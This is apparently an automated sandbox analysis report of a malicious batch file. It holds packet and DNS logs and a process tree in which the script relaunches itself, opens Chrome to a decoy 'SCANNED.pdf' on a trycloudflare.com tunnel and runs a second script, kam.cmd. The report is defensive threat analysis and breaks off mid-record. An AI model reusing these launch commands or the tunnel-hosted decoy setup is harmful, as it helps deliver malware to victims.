May 23, 2024 18:25:10.360028982 CEST	443	61584	142.250.185.164	192.168.2.7
May 23, 2024 18:25:10.360553026 CEST	443	61584	142.250.185.164	192.168.2.7
May 23, 2024 18:25:10.364125013 CEST	61584	443	192.168.2.7	142.250.185.164
May 23, 2024 18:25:10.364207029 CEST	443	61584	142.250.185.164	192.168.2.7
May 23, 2024 18:25:10.406393051 CEST	61584	443	192.168.2.7	142.250.185.164
May 23, 2024 18:25:20.200886011 CEST	443	61584	142.250.185.164	192.168.2.7
May 23, 2024 18:25:20.200959921 CEST	443	61584	142.250.185.164	192.168.2.7
May 23, 2024 18:25:20.201080084 CEST	61584	443	192.168.2.7	142.250.185.164
May 23, 2024 18:25:22.149000883 CEST	61584	443	192.168.2.7	142.250.185.164
May 23, 2024 18:25:22.149039984 CEST	443	61584	142.250.185.164	192.168.2.7
May 23, 2024 18:26:09.725362062 CEST	61587	443	192.168.2.7	142.250.186.100
May 23, 2024 18:26:09.725389957 CEST	443	61587	142.250.186.100	192.168.2.7
May 23, 2024 18:26:09.725467920 CEST	61587	443	192.168.2.7	142.250.186.100
May 23, 2024 18:26:09.725816011 CEST	61587	443	192.168.2.7	142.250.186.100
May 23, 2024 18:26:09.725830078 CEST	443	61587	142.250.186.100	192.168.2.7
May 23, 2024 18:26:10.373856068 CEST	443	61587	142.250.186.100	192.168.2.7
May 23, 2024 18:26:10.422211885 CEST	61587	443	192.168.2.7	142.250.186.100
May 23, 2024 18:26:10.490313053 CEST	61587	443	192.168.2.7	142.250.186.100
May 23, 2024 18:26:10.490339041 CEST	443	61587	142.250.186.100	192.168.2.7
May 23, 2024 18:26:10.490895987 CEST	443	61587	142.250.186.100	192.168.2.7
May 23, 2024 18:26:10.492518902 CEST	61587	443	192.168.2.7	142.250.186.100
May 23, 2024 18:26:10.492599964 CEST	443	61587	142.250.186.100	192.168.2.7
May 23, 2024 18:26:10.547286034 CEST	61587	443	192.168.2.7	142.250.186.100

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 18:24:05.546122074 CEST	53	50237	1.1.1.1	192.168.2.7
May 23, 2024 18:24:05.598110914 CEST	63287	53	192.168.2.7	1.1.1.1
May 23, 2024 18:24:05.598265886 CEST	60268	53	192.168.2.7	1.1.1.1
May 23, 2024 18:24:05.611032009 CEST	53	63287	1.1.1.1	192.168.2.7
May 23, 2024 18:24:05.624068975 CEST	53	49609	1.1.1.1	192.168.2.7
May 23, 2024 18:24:05.630202055 CEST	51886	53	192.168.2.7	1.1.1.1
May 23, 2024 18:24:05.635257959 CEST	53	60268	1.1.1.1	192.168.2.7
May 23, 2024 18:24:05.642714977 CEST	53	51886	1.1.1.1	192.168.2.7
May 23, 2024 18:24:05.770515919 CEST	60561	53	192.168.2.7	8.8.8.8
May 23, 2024 18:24:05.770821095 CEST	50335	53	192.168.2.7	1.1.1.1
May 23, 2024 18:24:05.845323086 CEST	53	60561	8.8.8.8	192.168.2.7
May 23, 2024 18:24:05.845366955 CEST	53	50335	1.1.1.1	192.168.2.7
May 23, 2024 18:24:06.707313061 CEST	53	62276	1.1.1.1	192.168.2.7
May 23, 2024 18:24:06.778506041 CEST	60099	53	192.168.2.7	1.1.1.1
May 23, 2024 18:24:06.778616905 CEST	61400	53	192.168.2.7	1.1.1.1
May 23, 2024 18:24:06.816528082 CEST	53	60099	1.1.1.1	192.168.2.7
May 23, 2024 18:24:06.816567898 CEST	53	61400	1.1.1.1	192.168.2.7
May 23, 2024 18:24:09.579237938 CEST	49347	53	192.168.2.7	1.1.1.1
May 23, 2024 18:24:09.579355955 CEST	55704	53	192.168.2.7	1.1.1.1
May 23, 2024 18:24:09.595748901 CEST	53	49347	1.1.1.1	192.168.2.7
May 23, 2024 18:24:09.605426073 CEST	53	55704	1.1.1.1	192.168.2.7
May 23, 2024 18:24:11.835675001 CEST	62793	53	192.168.2.7	1.1.1.1
May 23, 2024 18:24:11.836085081 CEST	58620	53	192.168.2.7	1.1.1.1
May 23, 2024 18:24:11.851766109 CEST	53	62793	1.1.1.1	192.168.2.7
May 23, 2024 18:24:11.860790014 CEST	62983	53	192.168.2.7	1.1.1.1
May 23, 2024 18:24:11.866328001 CEST	53	58620	1.1.1.1	192.168.2.7
May 23, 2024 18:24:11.871942997 CEST	53	62983	1.1.1.1	192.168.2.7
May 23, 2024 18:24:14.716069937 CEST	123	123	192.168.2.7	40.119.148.38
May 23, 2024 18:24:15.245043993 CEST	123	123	40.119.148.38	192.168.2.7
May 23, 2024 18:24:16.266361952 CEST	123	123	192.168.2.7	40.119.148.38
May 23, 2024 18:24:16.446962118 CEST	123	123	40.119.148.38	192.168.2.7
May 23, 2024 18:24:25.065414906 CEST	53	50063	1.1.1.1	192.168.2.7
May 23, 2024 18:24:41.897495031 CEST	56332	53	192.168.2.7	1.1.1.1
May 23, 2024 18:24:41.897660017 CEST	56724	53	192.168.2.7	1.1.1.1
May 23, 2024 18:24:41.912463903 CEST	53	56332	1.1.1.1	192.168.2.7
May 23, 2024 18:24:41.927514076 CEST	52988	53	192.168.2.7	1.1.1.1
May 23, 2024 18:24:41.927956104 CEST	53	56724	1.1.1.1	192.168.2.7
May 23, 2024 18:24:41.937741995 CEST	53	52988	1.1.1.1	192.168.2.7
May 23, 2024 18:24:43.874717951 CEST	53	62230	1.1.1.1	192.168.2.7
May 23, 2024 18:24:59.032543898 CEST	50147	53	192.168.2.7	1.1.1.1
May 23, 2024 18:24:59.047795057 CEST	53	50147	1.1.1.1	192.168.2.7
May 23, 2024 18:25:05.027565956 CEST	53	56072	1.1.1.1	192.168.2.7
May 23, 2024 18:25:06.475392103 CEST	53	49216	1.1.1.1	192.168.2.7
May 23, 2024 18:25:07.221158028 CEST	53	63017	1.1.1.1	192.168.2.7
May 23, 2024 18:25:10.454819918 CEST	138	138	192.168.2.7	192.168.2.255
May 23, 2024 18:25:33.899544954 CEST	54622	53	192.168.2.7	1.1.1.1
May 23, 2024 18:25:33.919218063 CEST	53	54622	1.1.1.1	192.168.2.7
May 23, 2024 18:25:37.337750912 CEST	53	51077	1.1.1.1	192.168.2.7
May 23, 2024 18:25:41.959498882 CEST	56374	53	192.168.2.7	1.1.1.1
May 23, 2024 18:25:41.959673882 CEST	57461	53	192.168.2.7	1.1.1.1
May 23, 2024 18:25:41.979556084 CEST	53	57461	1.1.1.1	192.168.2.7
May 23, 2024 18:25:41.986769915 CEST	53	56374	1.1.1.1	192.168.2.7
May 23, 2024 18:25:41.989706039 CEST	54862	53	192.168.2.7	1.1.1.1
May 23, 2024 18:25:42.008544922 CEST	53	54862	1.1.1.1	192.168.2.7
May 23, 2024 18:26:09.690180063 CEST	54647	53	192.168.2.7	1.1.1.1
May 23, 2024 18:26:09.690285921 CEST	50606	53	192.168.2.7	1.1.1.1
May 23, 2024 18:26:09.724495888 CEST	53	54647	1.1.1.1	192.168.2.7
May 23, 2024 18:26:09.724510908 CEST	53	50606	1.1.1.1	192.168.2.7

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 23, 2024 18:24:05.635340929 CEST	192.168.2.7	1.1.1.1	c248	(Port unreachable)	Destination Unreachable
May 23, 2024 18:24:11.866413116 CEST	192.168.2.7	1.1.1.1	c248	(Port unreachable)	Destination Unreachable
May 23, 2024 18:24:41.928051949 CEST	192.168.2.7	1.1.1.1	c248	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 23, 2024 18:24:05.598110914 CEST	192.168.2.7	1.1.1.1	0xbd7f	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:05.598265886 CEST	192.168.2.7	1.1.1.1	0xd84f	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	65	IN (0x0001)	false
May 23, 2024 18:24:05.630202055 CEST	192.168.2.7	1.1.1.1	0xf15f	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:05.770515919 CEST	192.168.2.7	8.8.8.8	0xcb3	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:05.770821095 CEST	192.168.2.7	1.1.1.1	0x7e18	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:06.778506041 CEST	192.168.2.7	1.1.1.1	0x34ee	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:06.778616905 CEST	192.168.2.7	1.1.1.1	0x653e	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	65	IN (0x0001)	false
May 23, 2024 18:24:09.579237938 CEST	192.168.2.7	1.1.1.1	0xce87	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:09.579355955 CEST	192.168.2.7	1.1.1.1	0xbac7	Standard query (0)	www.google.com	65	IN (0x0001)	false
May 23, 2024 18:24:11.835675001 CEST	192.168.2.7	1.1.1.1	0x1e09	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:11.836085081 CEST	192.168.2.7	1.1.1.1	0xcecf	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	65	IN (0x0001)	false
May 23, 2024 18:24:11.860790014 CEST	192.168.2.7	1.1.1.1	0x4f9a	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:41.897495031 CEST	192.168.2.7	1.1.1.1	0xcc1a	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:41.897660017 CEST	192.168.2.7	1.1.1.1	0x5212	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	65	IN (0x0001)	false
May 23, 2024 18:24:41.927514076 CEST	192.168.2.7	1.1.1.1	0xbddd	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:59.032543898 CEST	192.168.2.7	1.1.1.1	0x45ce	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:25:33.899544954 CEST	192.168.2.7	1.1.1.1	0x9ef3	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:25:41.959498882 CEST	192.168.2.7	1.1.1.1	0x173b	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:25:41.959673882 CEST	192.168.2.7	1.1.1.1	0xc755	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	65	IN (0x0001)	false
May 23, 2024 18:25:41.989706039 CEST	192.168.2.7	1.1.1.1	0xcc7b	Standard query (0)	valuable-gazette-shock-medication.trycloudflare.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:26:09.690180063 CEST	192.168.2.7	1.1.1.1	0xbb4e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:26:09.690285921 CEST	192.168.2.7	1.1.1.1	0xccc8	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 23, 2024 18:24:05.611032009 CEST	1.1.1.1	192.168.2.7	0xbd7f	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:05.635257959 CEST	1.1.1.1	192.168.2.7	0xd84f	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	65	IN (0x0001)	false
May 23, 2024 18:24:05.642714977 CEST	1.1.1.1	192.168.2.7	0xf15f	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:05.845323086 CEST	8.8.8.8	192.168.2.7	0xcb3	No error (0)	google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:05.845366955 CEST	1.1.1.1	192.168.2.7	0x7e18	No error (0)	google.com		142.250.185.110	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:06.816528082 CEST	1.1.1.1	192.168.2.7	0x34ee	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:06.816567898 CEST	1.1.1.1	192.168.2.7	0x653e	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	65	IN (0x0001)	false
May 23, 2024 18:24:09.595748901 CEST	1.1.1.1	192.168.2.7	0xce87	No error (0)	www.google.com		142.250.185.164	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:09.605426073 CEST	1.1.1.1	192.168.2.7	0xbac7	No error (0)	www.google.com			65	IN (0x0001)	false
May 23, 2024 18:24:11.851766109 CEST	1.1.1.1	192.168.2.7	0x1e09	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:11.866328001 CEST	1.1.1.1	192.168.2.7	0xcecf	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	65	IN (0x0001)	false
May 23, 2024 18:24:11.871942997 CEST	1.1.1.1	192.168.2.7	0x4f9a	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:41.912463903 CEST	1.1.1.1	192.168.2.7	0xcc1a	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:41.927956104 CEST	1.1.1.1	192.168.2.7	0x5212	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	65	IN (0x0001)	false
May 23, 2024 18:24:41.937741995 CEST	1.1.1.1	192.168.2.7	0xbddd	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	A (IP address)	IN (0x0001)	false
May 23, 2024 18:24:59.047795057 CEST	1.1.1.1	192.168.2.7	0x45ce	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	A (IP address)	IN (0x0001)	false
May 23, 2024 18:25:33.919218063 CEST	1.1.1.1	192.168.2.7	0x9ef3	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	A (IP address)	IN (0x0001)	false
May 23, 2024 18:25:41.979556084 CEST	1.1.1.1	192.168.2.7	0xc755	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	65	IN (0x0001)	false
May 23, 2024 18:25:41.986769915 CEST	1.1.1.1	192.168.2.7	0x173b	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	A (IP address)	IN (0x0001)	false
May 23, 2024 18:25:42.008544922 CEST	1.1.1.1	192.168.2.7	0xcc7b	Name error (3)	valuable-gazette-shock-medication.trycloudflare.com	none	none	A (IP address)	IN (0x0001)	false
May 23, 2024 18:26:09.724495888 CEST	1.1.1.1	192.168.2.7	0xbb4e	No error (0)	www.google.com		142.250.186.100	A (IP address)	IN (0x0001)	false
May 23, 2024 18:26:09.724510908 CEST	1.1.1.1	192.168.2.7	0xccc8	No error (0)	www.google.com			65	IN (0x0001)	false

HTTP Request Dependency Graph

fs.microsoft.com

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49708	23.43.61.160	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 16:24:19 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-23 16:24:19 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=258356 Date: Thu, 23 May 2024 16:24:19 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49709	23.43.61.160	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 16:24:20 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-23 16:24:20 UTC	535	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=258330 Date: Thu, 23 May 2024 16:24:20 GMT Content-Length: 55 Connection: close X-CID: 2
2024-05-23 16:24:20 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49710	40.68.123.157	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 16:24:22 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=HTyOcDWCCFHwzRB&MD=eFOmFNP4 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-23 16:24:22 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: e12b1fe3-aea6-4f3e-a463-720b82b42f2d MS-RequestId: 05f18306-21d9-4193-90e6-fd313cdba94d MS-CV: Avq1a4KHwESkWvf0.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 23 May 2024 16:24:21 GMT Connection: close Content-Length: 24490
2024-05-23 16:24:22 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-05-23 16:24:22 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49716	40.68.123.157	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 16:25:00 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=HTyOcDWCCFHwzRB&MD=eFOmFNP4 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-23 16:25:00 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_1440" MS-CorrelationId: 9150e480-10cf-410d-86c8-7d9b1b4fcdde MS-RequestId: 1fa21ac0-4950-4f41-a415-747604f9fff3 MS-CV: a6i3TtBUMEC/tdyM.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 23 May 2024 16:25:00 GMT Connection: close Content-Length: 25457
2024-05-23 16:25:00 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-05-23 16:25:00 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: cmd.exePID: 1768, Parent PID: 4056

General

Target ID:	1
Start time:	12:24:01
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\file.bat" "
Imagebase:	0x7ff780360000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2868, Parent PID: 1768

General

Target ID:	2
Start time:	12:24:01
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6440, Parent PID: 1768

General

Target ID:	3
Start time:	12:24:01
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\file.bat" MY_FLAG
Imagebase:	0x7ff780360000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5380, Parent PID: 6440

General

Target ID:	4
Start time:	12:24:01
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7120, Parent PID: 6440

General

Target ID:	6
Start time:	12:24:02
Start date:	23/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://valuable-gazette-shock-medication.trycloudflare.com/SCANNED.pdf
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6760, Parent PID: 6440

General

Target ID:	7
Start time:	12:24:02
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c ""C:\Users\user\Pictures\kam.cmd""
Imagebase:	0x7ff780360000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1664, Parent PID: 6760

General

Target ID:	8
Start time:	12:24:02
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
